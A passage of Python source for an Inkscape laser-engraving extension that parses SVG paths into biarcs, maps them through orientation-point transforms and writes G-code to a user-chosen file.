[R1.x, R1.y], a1, [P2.x, P2.y], [z1, zm]],\n                [[P2.x, P2.y], 'arc', [R2.x, R2.y], a2, [P4.x, P4.y], [zm, z2]]]\n\n\n################################################################################\n# Polygon class\n################################################################################\nclass Polygon:\n    def __init__(self, polygon=None):\n        self.polygon = [] if polygon == None else polygon[:]\n\n    def add(self, add):\n        if type(add) == type([]):\n            self.polygon += add[:]\n        else:\n            self.polygon += add.polygon[:]\n\n\nclass ArrangementGenetic:\n    # gene = [fitness, order, rotation, xposition]\n    # species = [gene]*shapes count\n    # population = [species]\n    def __init__(self, polygons, material_width):\n        self.population = []\n        self.genes_count = len(polygons)\n        self.polygons = polygons\n        self.width = material_width\n        self.mutation_factor = 0.1\n        self.order_mutate_factor = 1.\n        self.move_mutate_factor = 1.\n\n\n################################################################################\n###\n###\t\tGcodetools class\n###\n################################################################################\n\nclass LaserGcode(inkex.Effect):\n\n    def export_gcode(self, gcode):\n        gcode_pass = gcode\n        for x in range(1, self.options.passes):\n            gcode += \"G91\\nG1 Z-\" + self.options.pass_depth + \"\\nG90\\n\" + gcode_pass\n        f = open(self.options.directory + self.options.file, \"w\")\n        f.write(\n            self.options.laser_off_command + \" S0\" + \"\\n\" + self.header +\n            \"G1 F\" + self.options.travel_speed + \"\\n\" + gcode + 
self.footer)\n        f.close()\n\n    def add_arguments_old(self):\n        add_option = self.OptionParser.add_option\n\n        for arg in self.arguments:\n            # Stringify add_option arguments\n            action = arg[\"action\"] if \"action\" in arg else \"store\"\n            arg_type = {str: \"str\", int: \"int\", bool: \"inkbool\"}[arg[\"type\"]]\n            default = arg[\"type\"](arg[\"default\"])\n\n            add_option(\"\", arg[\"name\"], action=action, type=arg_type, dest=arg[\"dest\"],\n                       default=default, help=arg[\"help\"])\n\n    def add_arguments_new(self):\n        add_argument = self.arg_parser.add_argument\n\n        for arg in self.arguments:\n            # Not using kwargs unpacking for clarity, flexibility and consistency with add_arguments_old\n            action = arg[\"action\"] if \"action\" in arg else \"store\"\n            add_argument(arg[\"name\"], action=action, type=arg[\"type\"], dest=arg[\"dest\"],\n                         default=arg[\"default\"], help=arg[\"help\"])\n\n    def __init__(self):\n        inkex.Effect.__init__(self)\n\n        # Define command line arguments, inkex will use these to interface with the GUI defined in laser.inx\n\n        self.arguments = [\n            {\"name\": \"--directory\", \"type\": str, \"dest\": \"directory\",\n             \"default\": \"\", \"help\": \"Output directory\"},\n\n            {\"name\": \"--filename\", \"type\": str, \"dest\": \"file\",\n             \"default\": \"Dessin.gcode\", \"help\": \"File name\"},\n\n            {\"name\": \"--add-numeric-suffix-to-filename\", \"type\": inkex.Boolean,\n             \"dest\": \"add_numeric_suffix_to_filename\", \"default\": False,\n             \"help\": \"Add numeric suffix to file name\"},\n\n            {\"name\": \"--laser-command\", \"type\": str, \"dest\": \"laser_command\",\n             \"default\": \"G1 Z0 F15\", \"help\": \"Laser gcode command\"},\n\n            {\"name\": \"--laser-off-command\", \"type\": str, \"dest\": \"laser_off_command\",\n             \"default\": \"G1 Z1 F15\", \"help\": \"Laser gcode end command\"},\n\n            {\"name\": \"--laser-speed\", \"type\": int, \"dest\": \"laser_speed\",\n             \"default\": 3000, \"help\": \"Laser speed (mm/min)\"},\n\n            {\"name\": \"--travel-speed\", \"type\": str, \"dest\": \"travel_speed\",\n             \"default\": \"3000\", \"help\": \"Travel speed (mm/min)\"},\n\n            {\"name\": \"--laser-power\", \"type\": int, \"dest\": \"laser_power\", \"default\": 255,\n             \"help\": \"S# is 256 or 10000 for full power\"},\n\n            {\"name\": \"--passes\", \"type\": int, \"dest\": \"passes\", \"default\": 1,\n             \"help\": \"Quantity of passes\"},\n\n            {\"name\": \"--pass-depth\", \"type\": str, \"dest\": \"pass_depth\", \"default\": \"1\",\n             \"help\": \"Depth of laser cut\"},\n\n            {\"name\": \"--power-delay\", \"type\": str, \"dest\": \"power_delay\",\n             \"default\": \"0\", \"help\": \"Laser power-on delay (ms)\"},\n\n            {\"name\": \"--suppress-all-messages\", \"type\": inkex.Boolean,\n             \"dest\": \"suppress_all_messages\", \"default\": True,\n             \"help\": \"Hide messages during g-code generation\"},\n\n            {\"name\": \"--create-log\", \"type\": bool, \"dest\": \"log_create_log\",\n             \"default\": False, \"help\": \"Create log files\"},\n\n            {\"name\": \"--log-filename\", \"type\": str, \"dest\": \"log_filename\",\n             \"default\": '', \"help\": \"Create log files\"},\n\n            {\"name\": \"--engraving-draw-calculation-paths\", \"type\": inkex.Boolean,\n             \"dest\": \"engraving_draw_calculation_paths\", \"default\": False,\n             \"help\": \"Draw additional graphics to debug engraving path\"},\n\n            {\"name\": \"--unit\", \"type\": str, \"dest\": \"unit\",\n             \"default\": \"G21 (All units in mm)\", \"help\": \"Units either mm or inches\"},\n\n            {\"name\": \"--active-tab\", \"type\": str, \"dest\": \"active_tab\", \"default\": \"\",\n             \"help\": 
\"Defines which tab is active\"},\n\n {\"name\": \"--biarc-max-split-depth\", \"type\": int,\n \"dest\": \"biarc_max_split_depth\", \"default\": \"4\",\n \"help\": \"Defines maximum depth of splitting while approximating using biarcs.\"}\n ]\n\n if target_version < 1.0:\n self.add_arguments_old()\n else:\n self.add_arguments_new()\n\n # Another hack to maintain support across different Inkscape versions\n if target_version < 1.0:\n self.selected_hack = self.selected\n else:\n self.selected_hack = self.svg.selected\n\n def parse_curve(self, p, layer, w=None, f=None):\n c = []\n if len(p) == 0:\n return []\n p = self.transform_csp(p, layer)\n\n # Sort to reduce Rapid distance\n k = list(range(1, len(p)))\n keys = [0]\n while len(k) > 0:\n end = p[keys[-1]][-1][1]\n dist = (float('-inf'), float('-inf'))\n for i in range(len(k)):\n start = p[k[i]][0][1]\n dist = max((-((end[0] - start[0]) ** 2 + (end[1] - start[1]) ** 2), i), dist)\n\n keys += [k[dist[1]]]\n del k[dist[1]]\n for k in keys:\n subpath = p[k]\n c += [[[subpath[0][1][0], subpath[0][1][1]], 'move', 0, 0]]\n for i in range(1, len(subpath)):\n sp1 = [[subpath[i - 1][j][0], subpath[i - 1][j][1]] for j in range(3)]\n sp2 = [[subpath[i][j][0], subpath[i][j][1]] for j in range(3)]\n c += biarc(sp1, sp2, 0, 0) if w == None else biarc(sp1, sp2, -f(w[k][i - 1]), -f(w[k][i]))\n # l1 = biarc(sp1,sp2,0,0) if w==None else biarc(sp1,sp2,-f(w[k][i-1]),-f(w[k][i]))\n # print_((-f(w[k][i-1]),-f(w[k][i]), [i1[5] for i1 in l1]) )\n c += [[[subpath[-1][1][0], subpath[-1][1][1]], 'end', 0, 0]]\n print_(\"Curve: \" + str(c))\n return c\n\n def draw_curve(self, curve, layer, group=None, style=styles[\"biarc_style\"]):\n\n self.get_defs()\n # Add marker to defs if it does not exist\n if \"DrawCurveMarker\" not in self.defs:\n defs = etree.SubElement(self.document.getroot(), inkex.addNS(\"defs\", \"svg\"))\n marker = etree.SubElement(defs, inkex.addNS(\"marker\", \"svg\"),\n {\"id\": \"DrawCurveMarker\", \"orient\": \"auto\", \"refX\": \"-8\",\n \"refY\": \"-2.41063\", \"style\": \"overflow:visible\"})\n etree.SubElement(marker, inkex.addNS(\"path\", \"svg\"),\n {\n \"d\": \"m -6.55552,-2.41063 0,0 L -13.11104,0 c 1.0473,-1.42323 1.04126,-3.37047 0,-4.82126\",\n \"style\": \"fill:#000044; fill-rule:evenodd;stroke-width:0.62500000;stroke-linejoin:round;\"}\n )\n if \"DrawCurveMarker_r\" not in self.defs:\n defs = etree.SubElement(self.document.getroot(), inkex.addNS(\"defs\", \"svg\"))\n marker = etree.SubElement(defs, inkex.addNS(\"marker\", \"svg\"),\n {\"id\": \"DrawCurveMarker_r\", \"orient\": \"auto\", \"refX\": \"8\",\n \"refY\": \"-2.41063\", \"style\": \"overflow:visible\"})\n etree.SubElement(marker, inkex.addNS(\"path\", \"svg\"),\n {\n \"d\": \"m 6.55552,-2.41063 0,0 L 13.11104,0 c -1.0473,-1.42323 -1.04126,-3.37047 0,-4.82126\",\n \"style\": \"fill:#000044; fill-rule:evenodd;stroke-width:0.62500000;stroke-linejoin:round;\"}\n )\n for i in [0, 1]:\n style['biarc%s_r' % i] = simplestyle.parseStyle(style['biarc%s' % i])\n style['biarc%s_r' % i][\"marker-start\"] = \"url(#DrawCurveMarker_r)\"\n del (style['biarc%s_r' % i][\"marker-end\"])\n style['biarc%s_r' % i] = simplestyle.formatStyle(style['biarc%s_r' % i])\n\n if group is None:\n group = etree.SubElement(self.layers[min(1, len(self.layers) - 1)], inkex.addNS('g', 'svg'),\n {\"gcodetools\": \"Preview group\"})\n s, arcn = '', 0\n\n a, b, c = [0., 0.], [1., 0.], [0., 1.]\n k = (b[0] - a[0]) * (c[1] - a[1]) - (c[0] - a[0]) * (b[1] - a[1])\n a, b, c = self.transform(a, layer, True), 
self.transform(b, layer, True), self.transform(c, layer, True)\n        if ((b[0] - a[0]) * (c[1] - a[1]) - (c[0] - a[0]) * (b[1] - a[1])) * k > 0:\n            reverse_angle = 1\n        else:\n            reverse_angle = -1\n        for sk in curve:\n            si = sk[:]\n            si[0], si[2] = self.transform(si[0], layer, True), (\n                self.transform(si[2], layer, True) if type(si[2]) == type([]) and len(si[2]) == 2 else si[2])\n\n            if s != '':\n                if s[1] == 'line':\n                    etree.SubElement(group, inkex.addNS('path', 'svg'),\n                                     {\n                                         'style': style['line'],\n                                         'd': 'M %s,%s L %s,%s' % (s[0][0], s[0][1], si[0][0], si[0][1]),\n                                         \"gcodetools\": \"Preview\",\n                                     }\n                                     )\n                elif s[1] == 'arc':\n                    arcn += 1\n                    sp = s[0]\n                    c = s[2]\n                    s[3] = s[3] * reverse_angle\n\n                    a = ((P(si[0]) - P(c)).angle() - (P(s[0]) - P(c)).angle()) % math.pi2 # s[3]\n                    if s[3] * a < 0:\n                        if a > 0:\n                            a = a - math.pi2\n                        else:\n                            a = math.pi2 + a\n                    r = math.sqrt((sp[0] - c[0]) ** 2 + (sp[1] - c[1]) ** 2)\n                    a_st = (math.atan2(sp[0] - c[0], - (sp[1] - c[1])) - math.pi / 2) % (math.pi * 2)\n                    st = style['biarc%s' % (arcn % 2)][:]\n                    if a > 0:\n                        a_end = a_st + a\n                        st = style['biarc%s' % (arcn % 2)]\n                    else:\n                        a_end = a_st * 1\n                        a_st = a_st + a\n                        st = style['biarc%s_r' % (arcn % 2)]\n                    etree.SubElement(group, inkex.addNS('path', 'svg'),\n                                     {\n                                         'style': st,\n                                         inkex.addNS('cx', 'sodipodi'): str(c[0]),\n                                         inkex.addNS('cy', 'sodipodi'): str(c[1]),\n                                         inkex.addNS('rx', 'sodipodi'): str(r),\n                                         inkex.addNS('ry', 'sodipodi'): str(r),\n                                         inkex.addNS('start', 'sodipodi'): str(a_st),\n                                         inkex.addNS('end', 'sodipodi'): str(a_end),\n                                         inkex.addNS('open', 'sodipodi'): 'true',\n                                         inkex.addNS('type', 'sodipodi'): 'arc',\n                                         \"gcodetools\": \"Preview\",\n                                     })\n            s = si\n\n\n    def check_dir(self):\n        if self.options.directory[-1] not in [\"/\", \"\\\\\"]:\n            if \"\\\\\" in self.options.directory:\n                self.options.directory += \"\\\\\"\n            else:\n                self.options.directory += \"/\"\n        print_(\"Checking directory: '%s'\" % self.options.directory)\n        if (os.path.isdir(self.options.directory)):\n            if (os.path.isfile(self.options.directory + 'header')):\n                f = open(self.options.directory + 'header', 'r')\n                self.header = f.read()\n                f.close()\n            else:\n                self.header = defaults['header']\n            if (os.path.isfile(self.options.directory + 'footer')):\n                f = open(self.options.directory + 'footer', 'r')\n                self.footer = f.read()\n                f.close()\n            else:\n                self.footer = defaults['footer']\n\n            if self.options.unit == \"G21 (All units in mm)\":\n                self.header += \"G21\\n\"\n            elif self.options.unit == \"G20 (All units in inches)\":\n                self.header += \"G20\\n\"\n        else:\n            self.error(_(\"Directory does not exist! Please specify existing directory at options tab!\"), \"error\")\n            return False\n\n        
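# When enabled, scan the output directory and append the next free, zero-padded numeric suffix to the file name.\n        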
if self.options.add_numeric_suffix_to_filename:\n            dir_list = os.listdir(self.options.directory)\n            if \".\" in self.options.file:\n                r = re.match(r\"^(.*)(\\..*)$\", self.options.file)\n                ext = r.group(2)\n                name = r.group(1)\n            else:\n                ext = \"\"\n                name = self.options.file\n            max_n = 0\n            for s in dir_list:\n                r = re.match(r\"^%s_0*(\\d+)%s$\" % (re.escape(name), re.escape(ext)), s)\n                if r:\n                    max_n = max(max_n, int(r.group(1)))\n            filename = name + \"_\" + (\"0\" * (4 - len(str(max_n + 1))) + str(max_n + 1)) + ext\n            self.options.file = filename\n\n        print_(\"Testing write permissions on '%s'\" % (self.options.directory + self.options.file))\n        try:\n            f = open(self.options.directory + self.options.file, \"w\")\n            f.close()\n        except:\n            self.error(_(\"Can not write to specified file!\\n%s\" % (self.options.directory + self.options.file)),\n                       \"error\")\n            return False\n        return True\n\n\n    ################################################################################\n    #\n    # Generate Gcode\n    #\n    # Curve definition\n    # [start point, type = {'arc','line','move','end'}, arc center, arc angle, end point, [zstart, zend]]\n    #\n    ################################################################################\n\n    def generate_gcode(self, curve, layer, depth):\n        tool = self.tools\n        print_(\"Tool in g-code generator: \" + str(tool))\n\n        def c(c):\n            c = [c[i] if i < len(c) else None for i in range(6)]\n            if c[5] == 0: c[5] = None\n            s = [\" X\", \" Y\", \" Z\", \" I\", \" J\", \" K\"]\n            r = ''\n            for i in range(6):\n                if c[i] != None:\n                    r += s[i] + (\"%f\" % (round(c[i], 4))).rstrip('0')\n            return r\n\n\n        if len(curve) == 0: return \"\"\n\n        if not hasattr(self, 'last_used_tool'):\n            self.last_used_tool = None\n        print_(\"working on curve\")\n        print_(\"Curve: \" + str(curve))\n        g = \"\"\n\n        lg, f = 'G00', \"F%f\" % tool['penetration feed']\n        penetration_feed = \"F%s\" % tool['penetration feed']\n        current_a = 0\n        for i in range(1, len(curve)):\n            # Creating Gcode for curve between s=curve[i-1] and si=curve[i] start at s[0] end at s[4]=si[0]\n            s, si = curve[i - 1], curve[i]\n            feed = f if lg not in ['G01', 'G02', 'G03'] else ''\n            if s[1] == 'move':\n                g += \"G1 \" + c(si[0]) + \"\\n\" + tool['gcode before path'] + \"\\n\"\n                lg = 'G00'\n            elif s[1] == 'end':\n                g += tool['gcode after path'] + \"\\n\"\n                lg = 'G00'\n            elif s[1] == 'line':\n                if lg == \"G00\": g += \"G1 \" + feed + \"\\n\"\n                g += \"G1 \" + c(si[0]) + \"\\n\"\n                lg = 'G01'\n            elif s[1] == 'arc':\n                r = [(s[2][0] - s[0][0]), (s[2][1] - s[0][1])]\n                if lg == \"G00\": g += \"G1 \" + feed + \"\\n\"\n                if (r[0] ** 2 + r[1] ** 2) > .1:\n                    r1, r2 = (P(s[0]) - P(s[2])), (P(si[0]) - P(s[2]))\n                    if abs(r1.mag() - r2.mag()) < 0.001:\n                        g += (\"G2\" if s[3] < 0 else \"G3\") + c(\n                            si[0] + [None, (s[2][0] - s[0][0]), (s[2][1] - s[0][1])]) + \"\\n\"\n                    else:\n                        r = (r1.mag() + r2.mag()) / 2\n                        g += (\"G2\" if s[3] < 0 else \"G3\") + c(si[0]) + \" R%f\" % (r) + \"\\n\"\n                    lg = 'G02'\n                else:\n                    g += \"G1 \" + c(si[0]) + \" \" + feed + \"\\n\"\n                    lg = 'G01'\n        if si[1] == 'end':\n            g += tool['gcode after path'] + \"\\n\"\n        return g\n\n\n    def get_transforms(self, g):\n        root = self.document.getroot()\n        trans = []\n        while (g != root):\n            if 'transform' in list(g.keys()):\n                t = g.get('transform')\n                t = simpletransform.parseTransform(t)\n                trans = simpletransform.composeTransform(t, trans) if trans != [] else t\n                print_(trans)\n            g = g.getparent()\n        return trans\n\n\n    def apply_transforms(self, g, csp):\n        trans = 
self.get_transforms(g)\n        if trans != []:\n            simpletransform.applyTransformToPath(trans, csp)\n        return csp\n\n\n    def transform(self, source_point, layer, reverse=False):\n        if layer == None:\n            layer = self.current_layer if self.current_layer is not None else self.document.getroot()\n        if layer not in self.transform_matrix:\n            for i in range(self.layers.index(layer), -1, -1):\n                if self.layers[i] in self.orientation_points:\n                    break\n\n            print_(str(self.layers))\n            print_(str(\"I: \" + str(i)))\n            print_(\"Transform: \" + str(self.layers[i]))\n            if self.layers[i] not in self.orientation_points:\n                self.error(_(\n                    \"Orientation points for '%s' layer have not been found! Please add orientation points using Orientation tab!\") % layer.get(\n                    inkex.addNS('label', 'inkscape')), \"no_orientation_points\")\n            elif self.layers[i] in self.transform_matrix:\n                self.transform_matrix[layer] = self.transform_matrix[self.layers[i]]\n            else:\n                orientation_layer = self.layers[i]\n                if len(self.orientation_points[orientation_layer]) > 1:\n                    self.error(\n                        _(\"There are more than one orientation point groups in '%s' layer\") % orientation_layer.get(\n                            inkex.addNS('label', 'inkscape')), \"more_than_one_orientation_point_groups\")\n                points = self.orientation_points[orientation_layer][0]\n                if len(points) == 2:\n                    points += [[[(points[1][0][1] - points[0][0][1]) + points[0][0][0],\n                                 -(points[1][0][0] - points[0][0][0]) + points[0][0][1]],\n                                [-(points[1][1][1] - points[0][1][1]) + points[0][1][0],\n                                 points[1][1][0] - points[0][1][0] + points[0][1][1]]]]\n                if len(points) == 3:\n                    print_(\"Layer '%s' Orientation points: \" % orientation_layer.get(inkex.addNS('label', 'inkscape')))\n                    for point in points:\n                        print_(point)\n                    # Zcoordinates definition taken from Orientation point 1 and 2\n                    self.Zcoordinates[layer] = [max(points[0][1][2], points[1][1][2]),\n                                                min(points[0][1][2], points[1][1][2])]\n                    matrix = numpy.array([\n                        [points[0][0][0], points[0][0][1], 1, 0, 0, 0, 0, 0, 0],\n                        [0, 0, 0, points[0][0][0], points[0][0][1], 1, 0, 0, 0],\n                        [0, 0, 0, 0, 0, 0, points[0][0][0], points[0][0][1], 1],\n                        [points[1][0][0], points[1][0][1], 1, 0, 0, 0, 0, 0, 0],\n                        [0, 0, 0, points[1][0][0], points[1][0][1], 1, 0, 0, 0],\n                        [0, 0, 0, 0, 0, 0, points[1][0][0], points[1][0][1], 1],\n                        [points[2][0][0], points[2][0][1], 1, 0, 0, 0, 0, 0, 0],\n                        [0, 0, 0, points[2][0][0], points[2][0][1], 1, 0, 0, 0],\n                        [0, 0, 0, 0, 0, 0, points[2][0][0], points[2][0][1], 1]\n                    ])\n\n                    if numpy.linalg.det(matrix) != 0:\n                        m = numpy.linalg.solve(matrix,\n                                               numpy.array(\n                                                   [[points[0][1][0]], [points[0][1][1]], [1], [points[1][1][0]],\n                                                    [points[1][1][1]], [1], [points[2][1][0]], [points[2][1][1]], [1]]\n                                               )\n                                               ).tolist()\n                        self.transform_matrix[layer] = [[m[j * 3 + i][0] for i in range(3)] for j in range(3)]\n\n                    else:\n                        self.error(_(\n                            \"Orientation points are wrong! (if there are two orientation points they should not be the same. If there are three orientation points they should not be in a straight line.)\"),\n                            \"wrong_orientation_points\")\n                else:\n                    self.error(_(\n                        \"Orientation points are wrong! (if there are two orientation points they should not be the same. 
If there are three orientation points they should not be in a straight line.)\"),\n                        \"wrong_orientation_points\")\n\n            self.transform_matrix_reverse[layer] = numpy.linalg.inv(self.transform_matrix[layer]).tolist()\n            print_(\"\\n Layer '%s' transformation matrices:\" % layer.get(inkex.addNS('label', 'inkscape')))\n            print_(self.transform_matrix)\n            print_(self.transform_matrix_reverse)\n\n            # Zautoscale is absolute\n            self.Zauto_scale[layer] = 1\n            print_(\"Z automatic scale = %s (computed according to orientation points)\" % self.Zauto_scale[layer])\n\n        x, y = source_point[0], source_point[1]\n        if not reverse:\n            t = self.transform_matrix[layer]\n        else:\n            t = self.transform_matrix_reverse[layer]\n        return [t[0][0] * x + t[0][1] * y + t[0][2], t[1][0] * x + t[1][1] * y + t[1][2]]\n\n\n    def transform_csp(self, csp_, layer, reverse=False):\n        csp = [[[csp_[i][j][0][:], csp_[i][j][1][:], csp_[i][j][2][:]] for j in range(len(csp_[i]))] for i in\n               range(len(csp_))]\n        for i in range(len(csp)):\n            for j in range(len(csp[i])):\n                for k in range(len(csp[i][j])):\n                    csp[i][j][k] = self.transform(csp[i][j][k], layer, reverse)\n        return csp\n\n    ################################################################################\n    # Error handling function: notes are just printed into the log file,\n    # warnings are printed into the log file and a warning message is displayed but\n    # the extension continues working, errors cause a log entry and execution is halted\n    # Notes, warnings and errors could be assigned to space or comma or dot\n    # separated strings (case is ignored).\n    ################################################################################\n    def error(self, s, type_=\"Warning\"):\n        notes = \"Note \"\n        warnings = \"\"\"\n                        Warning tools_warning\n                        bad_orientation_points_in_some_layers\n                        more_than_one_orientation_point_groups\n                        more_than_one_tool\n                        orientation_have_not_been_defined\n                        tool_have_not_been_defined\n                        selection_does_not_contain_paths\n                        selection_does_not_contain_paths_will_take_all\n                        selection_is_empty_will_comupe_drawing\n                        selection_contains_objects_that_are_not_paths\n                        \"\"\"\n        errors = \"\"\"\n                        Error\n                        wrong_orientation_points\n                        area_tools_diameter_error\n                        no_tool_error\n                        active_layer_already_has_tool\n                        active_layer_already_has_orientation_points\n                        \"\"\"\n        if type_.lower() in re.split(\"[\\s\\n,\\.]+\", errors.lower()):\n            print_(s)\n            inkex.errormsg(s + \"\\n\")\n            sys.exit()\n        elif type_.lower() in re.split(\"[\\s\\n,\\.]+\", warnings.lower()):\n            print_(s)\n            if not self.options.suppress_all_messages:\n                inkex.errormsg(s + \"\\n\")\n        elif type_.lower() in re.split(\"[\\s\\n,\\.]+\", notes.lower()):\n            print_(s)\n        else:\n            print_(s)\n            inkex.errormsg(s)\n            sys.exit()\n\n    ################################################################################\n    # Get defs from svg\n    ################################################################################\n    def get_defs(self):\n        self.defs = {}\n\n        def recursive(g):\n            for i in g:\n                if i.tag == inkex.addNS(\"defs\", \"svg\"):\n                    for j in i:\n                        self.defs[j.get(\"id\")] = i\n                if i.tag == inkex.addNS(\"g\", 'svg'):\n                    recursive(i)\n\n        recursive(self.document.getroot())\n\n\n    ################################################################################\n    #\n    # Get Gcodetools info from the svg\n    #\n    ################################################################################\n    def get_info(self):\n        self.selected_paths = {}\n        self.paths = {}\n        self.orientation_points = {}\n        self.layers = [self.document.getroot()]\n        self.Zcoordinates = {}\n        self.transform_matrix = {}\n        
self.transform_matrix_reverse = {}\n        self.Zauto_scale = {}\n\n        def recursive_search(g, layer, selected=False):\n            items = g.getchildren()\n            items.reverse()\n            for i in items:\n                if selected:\n                    self.selected_hack[i.get(\"id\")] = i\n                if i.tag == inkex.addNS(\"g\", 'svg') and i.get(inkex.addNS('groupmode', 'inkscape')) == 'layer':\n                    self.layers += [i]\n                    recursive_search(i, i)\n                elif i.get('gcodetools') == \"Gcodetools orientation group\":\n                    points = self.get_orientation_points(i)\n                    if points != None:\n                        self.orientation_points[layer] = self.orientation_points[layer] + [\n                            points[:]] if layer in self.orientation_points else [points[:]]\n                        print_(\"Found orientation points in '%s' layer: %s\" % (\n                            layer.get(inkex.addNS('label', 'inkscape')), points))\n                    else:\n                        self.error(_(\n                            \"Warning! Found bad orientation points in '%s' layer. Resulting Gcode could be corrupt!\") % layer.get(\n                            inkex.addNS('label', 'inkscape')), \"bad_orientation_points_in_some_layers\")\n                elif i.tag == inkex.addNS('path', 'svg'):\n                    if \"gcodetools\" not in list(i.keys()):\n                        self.paths[layer] = self.paths[layer] + [i] if layer in self.paths else [i]\n                        if i.get(\"id\") in self.selected_hack:\n                            self.selected_paths[layer] = self.selected_paths[layer] + [\n                                i] if layer in self.selected_paths else [i]\n                elif i.tag == inkex.addNS(\"g\", 'svg'):\n                    recursive_search(i, layer, (i.get(\"id\") in self.selected_hack))\n                elif i.get(\"id\") in self.selected_hack:\n                    self.error(_(\n                        \"This extension works with Paths and Dynamic Offsets and groups of them only! All other objects will be ignored!\\nSolution 1: press Path->Object to path or Shift+Ctrl+C.\\nSolution 2: Path->Dynamic offset or Ctrl+J.\\nSolution 3: export all contours to PostScript level 2 (File->Save As->.ps) and File->Import this file.\"),\n                        \"selection_contains_objects_that_are_not_paths\")\n\n\n        recursive_search(self.document.getroot(), self.document.getroot())\n\n    def get_orientation_points(self, g):\n        items = g.getchildren()\n        items.reverse()\n        p2, p3 = [], []\n        p = None\n        for i in items:\n            if i.tag == inkex.addNS(\"g\", 'svg') and i.get(\"gcodetools\") == \"Gcodetools orientation point (2 points)\":\n                p2 += [i]\n            if i.tag == inkex.addNS(\"g\", 'svg') and i.get(\"gcodetools\") == \"Gcodetools orientation point (3 points)\":\n                p3 += [i]\n        if len(p2) == 2:\n            p = p2\n        elif len(p3) == 3:\n            p = p3\n        if p == None: return None\n        points = []\n        for i in p:\n            point = [[], []]\n            for node in i:\n                if node.get('gcodetools') == \"Gcodetools orientation point arrow\":\n                    point[0] = self.apply_transforms(node, parsePath(node.get(\"d\")))[0][0][1]\n                if node.get('gcodetools') == \"Gcodetools orientation point text\":\n                    r = re.match(\n                        r'(?i)\\s*\\(\\s*(-?\\s*\\d*(?:,|\\.)*\\d*)\\s*;\\s*(-?\\s*\\d*(?:,|\\.)*\\d*)\\s*;\\s*(-?\\s*\\d*(?:,|\\.)*\\d*)\\s*\\)\\s*',\n                        node.text)\n                    point[1] = [float(r.group(1)), float(r.group(2)), float(r.group(3))]\n            if point[0] != [] and point[1] != []: points += [point]\n        if len(points) == len(p2) == 2 or len(points) == len(p3) == 3:\n            return points\n        else:\n            return None\n\n    ################################################################################\n    #\n    # dxfpoints\n    #\n    ################################################################################\n    def dxfpoints(self):\n        if self.selected_paths == {}:\n            self.error(_(\n                \"Nothing is selected. 
Please select something to convert to drill point (dxfpoint) or clear point sign.\"),\n \"warning\")\n for layer in self.layers:\n if layer in self.selected_paths:\n for path in self.selected_paths[layer]:\n if self.options.dxfpoints_action == 'replace':\n path.set(\"dxfpoint\", \"1\")\n r = re.match(\"^\\s*.\\s*(\\S+)\", path.get(\"d\"))\n if r != None:\n print_((\"got path=\", r.group(1)))\n path.set(\"d\",\n \"m %s 2.9375,-6.343750000001 0.8125,1.90625 6.843748640396,-6.84374864039 0,0 0.6875,0.6875 -6.84375,6.84375 1.90625,0.812500000001 z\" % r.group(\n 1))\n path.set(\"style\", styles[\"dxf_points\"])\n\n if self.options.dxfpoints_action == 'save':\n path.set(\"dxfpoint\", \"1\")\n\n if self.options.dxfpoints_action == 'clear' and path.get(\"dxfpoint\") == \"1\":\n path.set(\"dxfpoint\", \"0\")\n\n ################################################################################\n #\n # Laser\n #\n ################################################################################\n def laser(self):\n\n def get_boundaries(points):\n minx, miny, maxx, maxy = None, None, None, None\n out = [[], [], [], []]\n for p in points:\n if minx == p[0]:\n out[0] += [p]\n if minx == None or p[0] < minx:\n minx = p[0]\n out[0] = [p]\n\n if miny == p[1]:\n out[1] += [p]\n if miny == None or p[1] < miny:\n miny = p[1]\n out[1] = [p]\n\n if maxx == p[0]:\n out[2] += [p]\n if maxx == None or p[0] > maxx:\n maxx = p[0]\n out[2] = [p]\n\n if maxy == p[1]:\n out[3] += [p]\n if maxy == None or p[1] > maxy:\n maxy = p[1]\n out[3] = [p]\n return out\n\n\n def remove_duplicates(points):\n i = 0\n out = []\n for p in points:\n for j in range(i, len(points)):\n if p == points[j]: points[j] = [None, None]\n if p != [None, None]: out += [p]\n i += 1\n return (out)\n\n\n def get_way_len(points):\n l = 0\n for i in range(1, len(points)):\n l += math.sqrt((points[i][0] - points[i - 1][0]) ** 2 + (points[i][1] - points[i - 1][1]) ** 2)\n return l\n\n def sort_dxfpoints(points):\n points = remove_duplicates(points)\n\n ways = [\n # l=0, d=1, r=2, u=3\n [3, 0], # ul\n [3, 2], # ur\n [1, 0], # dl\n [1, 2], # dr\n [0, 3], # lu\n [0, 1], # ld\n [2, 3], # ru\n [2, 1], # rd\n ]\n\n minimal_way = []\n minimal_len = None\n minimal_way_type = None\n for w in ways:\n tpoints = points[:]\n cw = []\n for j in range(0, len(points)):\n p = get_boundaries(get_boundaries(tpoints)[w[0]])[w[1]]\n tpoints.remove(p[0])\n cw += p\n curlen = get_way_len(cw)\n if minimal_len == None or curlen < minimal_len:\n minimal_len = curlen\n minimal_way = cw\n minimal_way_type = w\n\n return minimal_way\n\n if self.selected_paths == {}:\n paths = self.paths\n self.error(_(\"No paths are selected! 
Trying to work on all available paths.\"), \"warning\")\n        else:\n            paths = self.selected_paths\n\n        self.check_dir()\n        gcode = \"\"\n\n        biarc_group = etree.SubElement(\n            list(self.selected_paths.keys())[0] if len(list(self.selected_paths.keys())) > 0 else self.layers[0],\n            inkex.addNS('g', 'svg'))\n        print_((\"self.layers=\", self.layers))\n        print_((\"paths=\", paths))\n        for layer in self.layers:\n            if layer in paths:\n                print_((\"layer\", layer))\n                p = []\n                dxfpoints = []\n                for path in paths[layer]:\n                    print_(str(layer))\n                    if \"d\" not in list(path.keys()):\n                        self.error(_(\n                            \"Warning: One or more paths don't have a 'd' parameter, try to Ungroup (Ctrl+Shift+G) and Object to Path (Ctrl+Shift+C)!\"),\n                            \"selection_contains_objects_that_are_not_paths\")\n                        continue\n                    csp = parsePath(path.get(\"d\"))\n                    csp = self.apply_transforms(path, csp)\n                    if path.get(\"dxfpoint\") == \"1\":\n                        tmp_curve = self.transform_csp(csp, layer)\n                        x = tmp_curve[0][0][0][0]\n                        y = tmp_curve[0][0][0][1]\n                        print_(\"got dxfpoint (scaled) at (%f,%f)\" % (x, y))\n                        dxfpoints += [[x, y]]\n                    else:\n                        p += csp\n                dxfpoints = sort_dxfpoints(dxfpoints)\n                curve = self.parse_curve(p, layer)\n                self.draw_curve(curve, layer, biarc_group)\n                gcode += self.generate_gcode(curve, layer, 0)\n\n        self.export_gcode(gcode)\n\n    ################################################################################\n    #\n    # Orientation\n    #\n    ################################################################################\n    def orientation(self, layer=None):\n        print_(\"entering orientations\")\n        if layer == None:\n            layer = self.current_layer if self.current_layer is not None else self.document.getroot()\n        if 